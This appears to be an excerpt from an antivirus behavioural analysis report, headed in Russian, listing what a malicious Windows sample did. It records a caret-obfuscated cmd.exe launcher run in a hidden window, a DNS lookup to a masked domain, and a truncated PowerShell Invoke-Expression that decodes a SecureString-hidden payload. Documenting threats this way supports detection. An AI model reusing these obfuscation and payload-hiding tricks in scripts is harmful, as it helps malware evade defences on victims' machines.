Техническая информация
- '<SYSTEM32>\cmd.exe' MvhtAkmKp qzDzLBWnnrWKFbDRcsEBqWJtbzk bHbVpsaBOFJiji & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %JYzCLVVvziUFDDU%=iwoksChMaMXDiW&&set %fhFtzGkqK%=p&&set %qOrQ...
- DNS ASK fq####heuisdqwe.com
- '<SYSTEM32>\cmd.exe' MvhtAkmKp qzDzLBWnnrWKFbDRcsEBqWJtbzk bHbVpsaBOFJiji & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %JYzCLVVvziUFDDU%=iwoksChMaMXDiW&&set %fhFtzGkqK%=p&&set %qOrQ...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ".('inV'+'oKE'+'-'+'EXPReSSI'+'on')( ([RuNTimE.InTeropSERVICES.MARShal]::PtrTOStringBStR([rUNTiMe.interoPServiCes.maRShAl]::seCURESTrINgTObstr($('76492d1116743f0423413b16050a5345MgB8AGcAagBGAGQ...